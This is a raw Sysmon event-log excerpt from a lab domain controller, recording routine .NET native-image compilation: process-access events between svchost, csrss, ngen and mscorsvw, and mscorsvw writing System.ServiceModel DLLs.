13:51:13.523{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.507{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:13.507{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6804-00000000A301}3104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:13.460{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:13.460{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:13.460{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9251-6005-6704-00000000A301}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:13.366{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\3e4-0\System.ServiceModel.Discovery.dll2021-01-18 13:51:13.366 10341000x80000000000000008698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.819{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.804{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.804{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.616{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.601{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.601{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6D04-00000000A301}4188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:14.554{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1294-0\System.ServiceModel.ServiceMoniker40.dll2021-01-18 13:51:14.554 10341000x80000000000000008691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.491{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.476{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.476{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6C04-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.413{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.413{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6B04-00000000A301}4672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:14.351{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ed0-0\System.ServiceModel.Routing.dll2021-01-18 13:51:14.351 10341000x80000000000000008684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.038{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:14.023{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:14.023{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9252-6005-6A04-00000000A301}3792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:15.929{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.913{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
